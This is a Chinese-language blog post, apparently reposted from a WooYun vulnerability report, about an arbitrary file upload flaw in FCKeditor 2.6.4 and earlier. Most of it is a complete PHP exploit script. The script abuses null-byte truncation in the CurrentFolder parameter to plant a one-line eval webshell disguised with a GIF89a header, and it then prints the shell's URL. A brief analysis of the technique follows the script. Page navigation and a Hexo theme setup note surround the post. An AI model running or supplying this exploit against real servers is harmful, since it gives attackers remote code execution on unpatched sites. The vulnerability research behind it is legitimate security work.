

\xeb\xfe's Blog.

fckeditor2.6.4 任意文件上传漏洞

\xeb\xfe's Blog.

fckeditor2.6.4 任意文件上传漏洞

wooyun-1000php

 2017/12/10

简要描述

文件上传导致代码执行，fckeditor <= 2.6.4 任意文件上传漏洞, php coldfunsion应该KO了，asp表示很淡定，其他语言版本未测

详细说明

currentfolder过滤不给力，导致%00截断上传任意文件

漏洞证明

<?
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
$match = array();
function http_send($host, $packet)
{
	$sock = fsockopen($host, 80);
	while (!$sock)
	{
		print "\n[-] No response from {$host}:80 Trying again...";
		$sock = fsockopen($host, 80);
	}
	fputs($sock, $packet);
	while (!feof($sock)) $resp .= fread($sock, 1024);
	fclose($sock);
	print $resp;
	return $resp;
}
function connector_response($html)
{
	global $match;
	return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
}
print "\n+------------------------------------------------------------------+";
print "\n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ     |";
print "\n+------------------------------------------------------------------+\n";
if ($argv < 3)
{
	print "\nUsage......: php $argv[0] host path\n";
	print "\nExample....: php $argv[0] localhost /\n";
	print "\nExample....: php $argv[0] localhost /FCKEditor/\n";
	die();
}
$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);
$filename  = "fvck.gif";
$foldername = "fuck.php%00.gif";
$connector = "editor/filemanager/connectors/php/connector.php";
$payload  = "-----------------------------265001916915724\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type:  image/jpeg\r\n\r\n";
$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\n";
$payload .= "-----------------------------265001916915724--\r\n";
$packet	 = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";
//print $packet;
$packet	.= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
print $packet;
if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Job done! try http://${host}/$match[2] \n";
?>

POC分析

我们看到这个请求主要是修改CurrentFolder为 fuck.php%00.gif ，通过%00截断上传，上传一个fuck.php文件。fuck.php文件里面写了一句话木马
'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\n";,GIF89a文件头只是为了绕过检测。

原文链接：fckeditor 2.6.4 任意文件上传漏洞

• 往前一页 mvmmall网店商城系统注入漏洞-2011.07
• 往后一页 PHPCMS V9 通行证注册缺陷

Powered by HexoTheme archer

Welcome, No. visitor.

CATALOG

1. 1. 简要描述
2. 2. 详细说明
3. 3. 漏洞证明
4. 4. POC分析



archive tags

目前才写: 23 篇博文，好好努力吧，骚年。

2017

• 12/18MongoDB数据库评估
• 12/15漏洞评估-2
• 12/15漏洞评估-1
• 12/13php代码审计脑图
• 12/11WEB文件上传漏洞总结
• 12/10mvmmall网店商城系统注入漏洞-2011.07
• 12/10fckeditor2.6.4 任意文件上传漏洞
• 12/10PHPCMS V9 通行证注册缺陷
• 12/08dedecms v5.3-v5.6 Get Shell
• 12/08PHP168 V6.02整站系统远程执行任意代码漏洞
• 12/08Ecshop2.7.2持久型XSS（可获得管理员帐号）
• 12/08游戏风云cms存在SQL注入
• 12/08HZCMS 合正网站群内容管理系统SQL注射漏洞
• 12/08phpcms2008本地文件包括及利用（执行任意SQL脚本）
• 12/08PHPCMS通杀XSS-2010.08
• 12/08Discuz!漫游插件API本地包含漏洞
• 12/08phpwind远程代码执行漏洞-2010.09
• 12/08phpcms 2008 sp4 爆路径及任意文件删除漏洞
• 12/07ecshop SQL注射漏洞-2010.8.21
• 12/07Discuz！7.2/X1 第三方心情墙插件SQL注入及持久型XSS漏洞
• 12/07BlueCMS v1.6 sp1 ad_js.php SQL注入漏洞
• 11/26hxctf2017-writeup
• 11/24My blog

漏洞评估 小试牛刀 web渗透-文件上传 wooyun-1000php 脑图

缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true